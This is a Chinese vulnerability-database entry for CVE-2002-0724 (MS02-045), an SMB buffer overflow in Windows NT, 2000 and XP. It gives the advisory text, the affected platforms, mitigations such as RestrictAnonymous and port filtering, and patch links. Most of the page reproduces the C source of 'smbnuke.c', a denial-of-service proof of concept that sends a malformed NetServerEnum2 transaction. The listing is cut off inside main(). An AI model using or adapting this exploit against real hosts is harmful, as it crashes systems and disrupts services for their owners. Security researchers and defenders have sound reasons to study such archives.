CVE-2002-0724
CVSS7.5
发布时间 :2002-09-24 00:00:00
修订时间 :2016-10-17 22:21:51
NMCOEPS    

[原文]Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service".


[CNNVD]Microsoft网络共享器SMB请求远程缓冲区溢出漏洞(MS02-045)(CNNVD-200209-037)

        
        Microsoft Windows操作系统使用Server Message Block (SMB)协议提供开放交叉平台机制,通过网络对文件和打印共享服务的支持,也称为CIFS (Common Internet File System),目前CIFS在Windows下的实现是运行在TCP/139和TCP/445端口上,并依赖运行在TCP/IP之上的NETBIOS协议是否启用。
        Microsoft操作系统对畸形的SMB请求处理存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击,可能以系统权限执行任意代码。
        SMB_COM_TRANSACTION命令允许客户端和服务器端在特定服务器上的特定资源定义特殊的功能,此功能支持不由协议自身定义,而由客户端和服务器端实现。
        通过发送特殊构建的包请求NetServerEnum2, NetServerEnum3或者NetShareEnum transaction(事务处理),攻击者可以对目标机器进行拒绝服务攻击,可能以系统权限执行任意代码,但没有得到证实。攻击者只需在上述transaction的参数域中将'Max Param Count'或'Max Data Count'字段设置为零即可进行攻击。
        利用NetShareEnum transaction(事务处理)来触发这个漏洞,攻击者需要拥有一个合法的帐户,而利用NetServerEnum2和NetServerEnum3 transaction(事务处理)进行触发,则攻击者无需密码匿名即可进行访问。
        Windows操作系统默认情况下允许匿名用户进行访问,因此任意用户可以对默认配置的Windows操作系统进行拒绝服务攻击。
        成功利用这个漏洞攻击后,操作系统会出现系统崩溃(蓝屏),并出现如下类似信息:
        *** STOP: 0x0000001E (0xC0000005, 0x804B818B, 0x00000001, 0x00760065)
         KMODE_EXCEPTION_NOT_HANDLED
         *** Address 804B818B base at 80400000, DateStamp 384d9b17 0 ntoskrnl.exe
        物理内存被dump,系统重新启动。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp5:workstationMicrosoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_nt:4.0:sp6:workstationMicrosoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstationMicrosoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_nt:4.0:sp4:workstationMicrosoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstationMicrosoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstationMicrosoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_xp::goldMicrosoft windows xp_gold
cpe:/o:microsoft:windows_nt:4.0:sp6a:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6a
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstationMicrosoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_nt:4.0:sp5:serverMicrosoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:serverMicrosoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:serverMicrosoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_nt:4.0:sp4:serverMicrosoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp1:serverMicrosoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:serverMicrosoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:189Network Share Provider Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0724
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0724
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-037
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=103011556323184&w=2
(UNKNOWN)  BUGTRAQ  20020822 CORE-20020618: Vulnerabilities in Windows SMB (DoS)
http://www.kb.cert.org/vuls/id/250635
(VENDOR_ADVISORY)  CERT-VN  VU#250635
http://www.kb.cert.org/vuls/id/311619
(UNKNOWN)  CERT-VN  VU#311619
http://www.kb.cert.org/vuls/id/342243
(UNKNOWN)  CERT-VN  VU#342243
http://www.microsoft.com/technet/security/bulletin/ms02-045.asp
(VENDOR_ADVISORY)  MS  MS02-045

- 漏洞信息

Microsoft网络共享器SMB请求远程缓冲区溢出漏洞(MS02-045)
高危 边界条件错误
2002-09-24 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Windows操作系统使用Server Message Block (SMB)协议提供开放交叉平台机制,通过网络对文件和打印共享服务的支持,也称为CIFS (Common Internet File System),目前CIFS在Windows下的实现是运行在TCP/139和TCP/445端口上,并依赖运行在TCP/IP之上的NETBIOS协议是否启用。
        Microsoft操作系统对畸形的SMB请求处理存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击,可能以系统权限执行任意代码。
        SMB_COM_TRANSACTION命令允许客户端和服务器端在特定服务器上的特定资源定义特殊的功能,此功能支持不由协议自身定义,而由客户端和服务器端实现。
        通过发送特殊构建的包请求NetServerEnum2, NetServerEnum3或者NetShareEnum transaction(事务处理),攻击者可以对目标机器进行拒绝服务攻击,可能以系统权限执行任意代码,但没有得到证实。攻击者只需在上述transaction的参数域中将'Max Param Count'或'Max Data Count'字段设置为零即可进行攻击。
        利用NetShareEnum transaction(事务处理)来触发这个漏洞,攻击者需要拥有一个合法的帐户,而利用NetServerEnum2和NetServerEnum3 transaction(事务处理)进行触发,则攻击者无需密码匿名即可进行访问。
        Windows操作系统默认情况下允许匿名用户进行访问,因此任意用户可以对默认配置的Windows操作系统进行拒绝服务攻击。
        成功利用这个漏洞攻击后,操作系统会出现系统崩溃(蓝屏),并出现如下类似信息:
        *** STOP: 0x0000001E (0xC0000005, 0x804B818B, 0x00000001, 0x00760065)
         KMODE_EXCEPTION_NOT_HANDLED
         *** Address 804B818B base at 80400000, DateStamp 384d9b17 0 ntoskrnl.exe
        物理内存被dump,系统重新启动。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 可以限制匿名用户对Windows 2000P系统的LSA组件的访问,这可以避免匿名用户进行攻击,但无法防止合法用户的攻击。
         具体方法可参考如下步骤:
         在"开始 > 运行..."或者命令行窗口中运行注册表编辑器(regedt32.exe), 找到下列键:
         HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
         增加或者修改键值"RestrictAnonymous"
         键值: RestrictAnonymous
         类型: REG_DWORD
         数据: 0x2 (十六进制)
         重启系统使注册表修改生效。
         或者您也可以使用下面的方法:
         打开控制面版 -- 管理工具 -- 本地安全策略(如果是域控制器则是"域安全策略"),
         在其中的本地策略 -- 安全选项中设置"对匿名连接的额外限制",
         选择"没有显式匿名权限就无法访问",重启系统。
         对于Windows NT和XP,无法通过修改注册表禁止匿名用户访问,您只能暂时关闭共享服务。
        
         注意:禁止匿名用户连接(空会话)在某些情况下(例如在域服务器或者SQL服务器上)可能会影响某些正常功能的实现,因此NSFOCUS推荐您尽快安装补丁。
        
        * 如果您并不需要提供网络共享服务,可以完全关闭共享。
         windows2000和XP下面关闭共享的办法是:
         在控制面版 - 网络和拨号连接 - 高级 (菜单栏) - 高级设置中
         选择本地连接的绑定 - 去掉"Microsoft网络的文件和打印机共享"。
         Windows NT下面关闭共享的办法是:
         网上邻居 - 属性(右键) - 绑定 - 选择所有协议 - 禁用WINS客户
        * 在网关设备或边界防火墙上过滤对内网主机下列端口的访问:
         139/TCP
         445/TCP
         445/UDP
         注意这不能防止内部恶意用户的攻击。如需防止内部恶意用户的攻击,需要安装主机防火墙软件或者启用Windows自带的TCP/IP筛选机制来过滤上述端口。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS02-045)以及相应补丁:
        MS02-045:Unchecked Buffer in Network Share Provider Can Lead to Denial of Service(Q326830)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS02-045.asp

        补丁下载:
         * Microsoft Windows NT 4.0:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41493

         * Microsoft Windows NT 4.0 Terminal Server Edition:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41519

         * Microsoft Windows 2000:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41468

         * Microsoft Windows XP:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41524

         * Microsoft Windows XP 64 bit Edition:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41549

- 漏洞信息 (21746)

MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1) (EDBID:21746)
windows dos
2002-08-22 Verified
0 Frederic Deletang
N/A [点击下载]
source: http://www.securityfocus.com/bid/5556/info

Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reporting in the handling of some malformed SMB requests.

An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system.

It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed.

Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.

It has been reported, by "Fabio Pietrosanti \(naif\)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerablity. 

/*
 *   smbnuke.c -- Windows SMB Nuker (DoS) - Proof of concept
 *   Copyright (C) 2002  Frederic Deletang (df@phear.org)
 *
 *   This program is free software; you can redistribute it and/or
 *   modify it under the terms of the GNU General Public License
 *   as published by the Free Software Foundation; either version 2 of
 *   the License or (at your option) any later version.
 *
 *   This program is distributed in the hope that it will be
 *   useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 *   of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *   GNU General Public License for more details.
 *
 *   You should have received a copy of the GNU General Public License
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 *   USA
 */

/* NOTE:
 * Compile this program using only GCC and no other compilers
 * (except if you think this one supports the __attribute__ (( packed )) attribute)
 * This program might not work on big-endian systems.
 * It has been successfully tested from the following plateforms:
 * 	- Linux 2.4.18 / i686
 * 	- FreeBSD 4.6.1-RELEASE-p10 / i386
 * Don't bother me if you can't get it to compile or work on Solaris using the SunWS compiler.
 *
 * Another thing: The word counts are hardcoded, careful if you hack the sources.
 */

/* Copyright notice:
 * some parts of this source (only two functions, name_len and name_mangle)
 * has been taken from libsmb.  The rest, especially the structures has
 * been written by me.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>
#include <stdlib.h>
#include <ctype.h>
#include <assert.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <sys/time.h>

#define SESSION_REQUEST 0x81

#define SESSION_MESSAGE 0x00

#define SMB_NEGOTIATE_PROTOCOL 0x72
#define SMB_SESSION_SETUP_ANDX 0x73
#define SMB_TREE_CONNECT_ANDX 0x75
#define SMB_COM_TRANSACTION 0x25

#define bswap16(x) \
	((((x) >> 8) & 0xff) | (((x) & 0xff) << 8))

typedef struct
{
  unsigned char server_component[4];
  unsigned char command;
  unsigned char error_class;
  unsigned char reserved1;
  uint16_t error_code;
  uint8_t flags;
  uint16_t flags2;
  unsigned char reserved2[12];
  uint16_t tree_id;
  uint16_t proc_id;
  uint16_t user_id;
  uint16_t mpex_id;
}
__attribute__ ((packed)) smb_header;

typedef struct
{
  unsigned char type;
  unsigned char flags;
  unsigned short length;
  unsigned char called[34];
  unsigned char calling[34];
}
__attribute__ ((packed)) nbt_packet;

typedef struct
{
  /* wct: word count */
  uint8_t wct;
  unsigned char andx_command;
  unsigned char reserved1;
  uint16_t andx_offset;
  uint16_t max_buffer;
  uint16_t max_mpx_count;
  uint16_t vc_number;
  uint32_t session_key;
  uint16_t ANSI_pwlen;
  uint16_t UNI_pwlen;
  unsigned char reserved2[4];
  uint32_t capabilities;
  /* bcc: byte count */
  uint16_t bcc;
}
__attribute__ ((packed)) session_setup_andx_request;

typedef struct
{
  /* wct: word count */
  uint8_t wct;
  unsigned char andx_command;
  unsigned char reserved1;
  uint16_t andx_offset;
  uint16_t flags;
  uint16_t pwlen;
  uint16_t bcc;
}
__attribute__ ((packed)) tree_connect_andx_request;

typedef struct
{
  /* wct: word count */
  uint8_t wct;
  uint16_t total_param_cnt;
  uint16_t total_data_cnt;
  uint16_t max_param_cnt;
  uint16_t max_data_cnt;
  uint8_t max_setup_cnt;
  unsigned char reserved1;
  uint16_t flags;
  uint32_t timeout;
  uint16_t reserved2;
  uint16_t param_cnt;
  uint16_t param_offset;
  uint16_t data_cnt;
  uint16_t data_offset;
  uint8_t setup_count;
  uint8_t reserved3;
  /* bcc: byte count */
  uint16_t bcc;
}
__attribute__ ((packed)) transaction_request;

typedef struct
{
  uint16_t function_code;
  unsigned char param_descriptor[6];
  unsigned char return_descriptor[7];
  uint16_t detail_level;
  uint16_t recv_buffer_len;
}
__attribute__ ((packed)) parameters;


typedef struct
{
  uint8_t format;
  unsigned char *name;
}
t_dialects;

t_dialects dialects[] = {
  {2, "PC NETWORK PROGRAM 1.0"},
  {2, "MICROSOFT NETWORKS 1.03"},
  {2, "MICROSOFT NETWORKS 3.0"},
  {2, "LANMAN1.0"},
  {2, "LM1.2X002"},
  {2, "Samba"},
  {2, "NT LM 0.12"},
  {2, "NT LANMAN 1.0"},
  {0, NULL}
};

enum
{
  STATE_REQUESTING_SESSION_SETUP = 1,
  STATE_NEGOTIATING_PROTOCOL,
  STATE_REQUESTING_SESSION_SETUP_ANDX,
  STATE_REQUESTING_TREE_CONNECT_ANDX,
  STATE_REQUESTING_TRANSACTION
}
status;

const unsigned char *global_scope = NULL;

/****************************************************************************
 * return the total storage length of a mangled name - from smbclient
 *
 ****************************************************************************/

int
name_len (char *s1)
{
  /* NOTE: this argument _must_ be unsigned */
  unsigned char *s = (unsigned char *) s1;
  int len;

  /* If the two high bits of the byte are set, return 2. */
  if (0xC0 == (*s & 0xC0))
    return (2);

  /* Add up the length bytes. */
  for (len = 1; (*s); s += (*s) + 1)
    {
      len += *s + 1;
      assert (len < 80);
    }

  return (len);
}                               /* name_len */


/****************************************************************************
 * mangle a name into netbios format - from smbclient 
 *  Note:  <Out> must be (33 + strlen(scope) + 2) bytes long, at minimum.
 *
 ****************************************************************************/

int
name_mangle (char *In, char *Out, char name_type)
{
  int i;
  int c;
  int len;
  char buf[20];
  char *p = Out;

  /* Safely copy the input string, In, into buf[]. */
  (void) memset (buf, 0, 20);
  if (strcmp (In, "*") == 0)
    buf[0] = '*';
  else
    (void) snprintf (buf, sizeof (buf) - 1, "%-15.15s%c", In, name_type);

  /* Place the length of the first field into the output buffer. */
  p[0] = 32;
  p++;

  /* Now convert the name to the rfc1001/1002 format. */
  for (i = 0; i < 16; i++)
    {
      c = toupper (buf[i]);
      p[i * 2] = ((c >> 4) & 0x000F) + 'A';
      p[(i * 2) + 1] = (c & 0x000F) + 'A';
    }
  p += 32;
  p[0] = '\0';

  /* Add the scope string. */
  for (i = 0, len = 0; NULL != global_scope; i++, len++)
    {
      switch (global_scope[i])
        {
        case '\0':
          p[0] = len;
          if (len > 0)
            p[len + 1] = 0;
          return (name_len (Out));
        case '.':
          p[0] = len;
          p += (len + 1);
          len = -1;
          break;
        default:
          p[len + 1] = global_scope[i];
          break;
        }
    }

  return (name_len (Out));

}

int
tcp_connect (const char *rhost, unsigned short port)
{
  struct sockaddr_in dest;
  struct hostent *host;
  int fd;

  host = gethostbyname (rhost);
  if (host == NULL)
    {
      fprintf (stderr, "Could not resolve host: %s\n", rhost);
      return -1;
    }

  dest.sin_family = AF_INET;
  dest.sin_addr.s_addr = *(long *) (host->h_addr);
  dest.sin_port = htons (port);

  fd = socket (AF_INET, SOCK_STREAM, 0);

  if (connect (fd, (struct sockaddr *) &dest, sizeof (dest)) < 0)
    {
      fprintf (stderr, "Could not connect to %s:%d - %s\n", rhost, port,
               strerror (errno));
      return -1;
    }

  return fd;
}

void
build_smb_header (smb_header * hdr, uint8_t command, uint8_t flags,
                  uint16_t flags2, uint16_t tree_id, uint16_t proc_id,
                  uint16_t user_id, uint16_t mpex_id)
{
  memset (hdr, 0, sizeof (smb_header));

  /* SMB Header MAGIC. */
  hdr->server_component[0] = 0xff;
  hdr->server_component[1] = 'S';
  hdr->server_component[2] = 'M';
  hdr->server_component[3] = 'B';

  hdr->command = command;

  hdr->flags = flags;
  hdr->flags2 = flags2;

  hdr->tree_id = tree_id;
  hdr->proc_id = proc_id;
  hdr->user_id = user_id;
  hdr->mpex_id = mpex_id;
}

unsigned char *
push_string (unsigned char *stack, unsigned char *string)
{
  strcpy (stack, string);
  return stack + strlen (stack) + 1;
}

void
request_session_setup (int fd, char *netbios_name)
{
  nbt_packet pkt;

  pkt.type = SESSION_REQUEST;
  pkt.flags = 0x00;
  pkt.length = bswap16 (sizeof (nbt_packet));
  name_mangle (netbios_name, pkt.called, 0x20);
  name_mangle ("", pkt.calling, 0x00);
  write (fd, &pkt, sizeof (nbt_packet));

}

void
negotiate_protocol (unsigned char *buffer, int fd)
{
  smb_header hdr;
  unsigned char *p;
  uint16_t proc_id, mpex_id;
  int i;

  proc_id = (uint16_t) rand ();
  mpex_id = (uint16_t) rand ();

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  build_smb_header (&hdr, SMB_NEGOTIATE_PROTOCOL, 0, 0, 0, proc_id, 0,
                    mpex_id);

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  p = buffer + 4 + sizeof (smb_header) + 3;

  for (i = 0; dialects[i].name != NULL; i++)
    {
      *p = dialects[i].format;
      strcpy (p + 1, dialects[i].name);
      p += strlen (dialects[i].name) + 2;
    }

  /* Set the word count */
  *(uint8_t *) (buffer + 4 + sizeof (smb_header)) = 0;

  /* Set the byte count */
  *(uint16_t *) (buffer + 4 + sizeof (smb_header) + 1) =
    (uint16_t) (p - buffer - 4 - sizeof (smb_header) - 3);

  *(uint16_t *) (buffer + 2) = bswap16 ((uint16_t) (p - buffer - 4));

  write (fd, buffer, p - buffer);

}

void
request_session_setup_andx (unsigned char *buffer, int fd)
{
  smb_header hdr;
  session_setup_andx_request ssar;
  uint16_t proc_id, mpex_id;
  unsigned char *p;

  proc_id = (uint16_t) rand ();
  mpex_id = (uint16_t) rand ();

  build_smb_header (&hdr, SMB_SESSION_SETUP_ANDX, 0x08, 0x0001, 0, proc_id, 0,
                    mpex_id);

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  p = buffer + 4 + sizeof (smb_header);

  memset (&ssar, 0, sizeof (session_setup_andx_request));
  ssar.wct = 13;
  ssar.andx_command = 0xff;     /* No further commands */
  ssar.max_buffer = 65535;
  ssar.max_mpx_count = 2;
  ssar.vc_number = 1025;

  ssar.ANSI_pwlen = 1;

  p = buffer + 4 + sizeof (smb_header) + sizeof (session_setup_andx_request);

  /* Ansi password */
  p = push_string (p, "");

  /* Account */
  p = push_string (p, "");

  /* Primary domain */
  p = push_string (p, "WORKGROUP");

  /* Native OS */
  p = push_string (p, "Unix");

  /* Native Lan Manager */
  p = push_string (p, "Samba");

  ssar.bcc =
    p - buffer - 4 - sizeof (smb_header) -
    sizeof (session_setup_andx_request);

  memcpy (buffer + 4 + sizeof (smb_header), &ssar,
          sizeof (session_setup_andx_request));

  /* Another byte count */
  *(uint16_t *) (buffer + 2) =
    bswap16 ((uint16_t)
             (sizeof (session_setup_andx_request) + sizeof (smb_header) +
              ssar.bcc));

  write (fd, buffer,
         sizeof (session_setup_andx_request) + sizeof (smb_header) + 4 +
         ssar.bcc);
}

void
request_tree_connect_andx (unsigned char *buffer, int fd,
                           const char *netbios_name)
{
  smb_header hdr;
  tree_connect_andx_request tcar;
  uint16_t proc_id, user_id;
  unsigned char *p, *q;

  proc_id = (uint16_t) rand ();
  user_id = ((smb_header *) (buffer + 4))->user_id;

  build_smb_header (&hdr, SMB_TREE_CONNECT_ANDX, 0x18, 0x2001, 0, proc_id,
                    user_id, 0);

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  memset (&tcar, 0, sizeof (tree_connect_andx_request));

  tcar.wct = 4;
  tcar.andx_command = 0xff;     /* No further commands */
  tcar.pwlen = 1;

  p = buffer + 4 + sizeof (smb_header) + sizeof (tree_connect_andx_request);

  /* Password */
  p = push_string (p, "");

  /* Path */
  q = malloc (8 + strlen (netbios_name));

  sprintf (q, "\\\\%s\\IPC$", netbios_name);
  p = push_string (p, q);

  free (q);

  /* Service */
  p = push_string (p, "IPC");

  tcar.bcc =
    p - buffer - 4 - sizeof (smb_header) - sizeof (tree_connect_andx_request);

  memcpy (buffer + 4 + sizeof (smb_header), &tcar,
          sizeof (tree_connect_andx_request));

  /* Another byte count */
  *(uint16_t *) (buffer + 2) =
    bswap16 ((uint16_t)
             (sizeof (tree_connect_andx_request) + sizeof (smb_header) +
              tcar.bcc));

  write (fd, buffer,
         sizeof (tree_connect_andx_request) + sizeof (smb_header) + 4 +
         tcar.bcc);
}

void
request_transaction (unsigned char *buffer, int fd)
{
  smb_header hdr;
  transaction_request transaction;
  parameters params;
  uint16_t proc_id, tree_id, user_id;
  unsigned char *p;

  proc_id = (uint16_t) rand ();
  tree_id = ((smb_header *) (buffer + 4))->tree_id;
  user_id = ((smb_header *) (buffer + 4))->user_id;

  build_smb_header (&hdr, SMB_COM_TRANSACTION, 0, 0, tree_id, proc_id,
                    user_id, 0);

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  memset (&transaction, 0, sizeof (transaction_request));

  transaction.wct = 14;
  transaction.total_param_cnt = 19; /* Total lenght of parameters */
  transaction.param_cnt = 19; /* Lenght of parameter */

  p = buffer + 4 + sizeof (smb_header) + sizeof (transaction_request);

  /* Transaction name */
  p = push_string (p, "\\PIPE\\LANMAN");

  transaction.param_offset = p - buffer - 4;

  params.function_code = (uint16_t) 0x68;       /* NetServerEnum2 */
  strcpy (params.param_descriptor, "WrLeh");    /* RAP_NetGroupEnum_REQ  */
  strcpy (params.return_descriptor, "B13BWz");  /* RAP_SHARE_INFO_L1 */
  params.detail_level = 1;
  params.recv_buffer_len = 50000;

  memcpy (p, &params, sizeof (parameters));

  p += transaction.param_cnt;

  transaction.data_offset = p - buffer - 4;

  transaction.bcc =
    p - buffer - 4 - sizeof (smb_header) - sizeof (transaction_request);

  memcpy (buffer + 4 + sizeof (smb_header), &transaction,
          sizeof (transaction_request));

  /* Another byte count */
  *(uint16_t *) (buffer + 2) =
    bswap16 ((uint16_t)
             (sizeof (transaction_request) + sizeof (smb_header) +
              transaction.bcc));

  write (fd, buffer,
         sizeof (transaction_request) + sizeof (smb_header) + 4 +
         transaction.bcc);
}

typedef struct
{
  uint16_t transaction_id;
  uint16_t flags;
  uint16_t questions;
  uint16_t answerRRs;
  uint16_t authorityRRs;
  uint16_t additionalRRs;

  unsigned char query[32];
  uint16_t name;
  uint16_t type;
  uint16_t class;
}
__attribute__ ((packed)) nbt_name_query;

typedef struct
{
  nbt_name_query answer;
  uint32_t ttl;
  uint16_t datalen;
  uint8_t names;
}
__attribute__ ((packed)) nbt_name_query_answer;

char *
list_netbios_names (unsigned char *buffer, size_t size, const char *rhost,
                    unsigned short port, unsigned int timeout)
{
  nbt_name_query query;
  struct sockaddr_in dest;
  struct hostent *host;
  int fd, i;

  fd_set rfds;
  struct timeval tv;

  printf ("Trying to list netbios names on %s\n", rhost);

  host = gethostbyname (rhost);
  if (host == NULL)
    {
      fprintf (stderr, "Could not resolve host: %s\n", rhost);
      return NULL;
    }

  memset (&dest, 0, sizeof (struct sockaddr_in));

  dest.sin_family = AF_INET;
  dest.sin_addr.s_addr = *(long *) (host->h_addr);
  dest.sin_port = htons (port);

  if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) < 0)
    {
      fprintf (stderr, "Could not setup the UDP socket: %s\n",
               strerror (errno));
      return NULL;
    }

  memset (&query, 0, sizeof (nbt_name_query));

  query.transaction_id = (uint16_t) bswap16 (0x1e);     //rand();
  query.flags = bswap16 (0x0010);
  query.questions = bswap16 (1);

  name_mangle ("*", query.query, 0);
  query.type = bswap16 (0x21);
  query.class = bswap16 (0x01);

  if (sendto
      (fd, &query, sizeof (nbt_name_query), 0, (struct sockaddr *) &dest,
       sizeof (struct sockaddr_in)) != sizeof (nbt_name_query))
    {
      fprintf (stderr, "Could not send UDP packet: %s\n", strerror (errno));
      return NULL;
    }

  /* Now, wait for an answer -- add a timeout to 10 seconds */

  FD_ZERO (&rfds);
  FD_SET (fd, &rfds);

  tv.tv_sec = timeout;
  tv.tv_usec = 0;

  if (!select (fd + 1, &rfds, NULL, NULL, &tv))
    {
      fprintf (stderr,
               "The udp read has reached the timeout - try setting the netbios name manually - exiting...\n");
      return NULL;
    }

  recvfrom (fd, buffer, size, 0, NULL, NULL);

  for (i = 0; i < ((nbt_name_query_answer *) buffer)->names; i++)
    if ((uint8_t) * (buffer + sizeof (nbt_name_query_answer) + 18 * i + 15) ==
        0x20)
      return buffer + sizeof (nbt_name_query_answer) + 18 * i;

  printf ("No netbios name available for use - you probably won't be able to crash this host\n");
  printf ("However, you can try setting one manually\n");
  
  return NULL;
}

char *
extract_name (const char *name)
{
  int i;
  char *p = malloc(14);

  for (i = 0; i < 14; i++)
    if (name[i] == ' ')
      break;
     else
      p[i] = name[i];

  p[i] = '\0';

  return p;
}

void
print_banner (void)
{
  printf ("Windows SMB Nuker (DoS) - Proof of concept - CVE CAN-2002-0724\n");
  printf ("Copyright 2002 - Frederic Deletang (df@phear.org) - 28/08/2002\n\n");
}

int
is_smb_header (const unsigned char *buffer, int len)
{
  if (len < sizeof (smb_header))
    return 0;

  if (buffer[0] == 0xff && buffer[1] == 'S' && buffer[2] == 'M'
      && buffer[3] == 'B')
    return 1;
  else
    return 0;
}

int
main (int argc, char **argv)
{
  int fd, r, i, c;
  unsigned char buffer[1024 * 4];       /* Enough. */
  char *hostname = NULL, *name = NULL;

  unsigned int showhelp = 0;

  unsigned int packets = 10;
  unsigned int state;

  unsigned int udp_timeout = 10;
  unsigned int tcp_timeout = 10;

  unsigned short netbios_ssn_port = 139;
  unsigned short netbios_ns_port = 137;

  fd_set rfds;
  struct timeval tv;

  srand (time (NULL));

  print_banner ();

  while ((c = getopt (argc, argv, "N:n:p:P:t:T:h")) != -1)
    {
      switch (c)
        {
        case 'N':
          name = optarg;
          break;
        case 'n':
          packets = atoi (optarg);
          break;
        case 'p':
          netbios_ns_port = atoi (optarg);
          break;
        case 'P':
          netbios_ssn_port = atoi (optarg);
          break;
        case 't':
          udp_timeout = atoi (optarg);
          break;
        case 'T':
          tcp_timeout = atoi (optarg);
          break;
        case 'h':
        default:
          showhelp = 1;
          break;
        }
    }

  if (optind < argc)
	  hostname = argv[optind++];
  
  if (showhelp || hostname == NULL)
    {
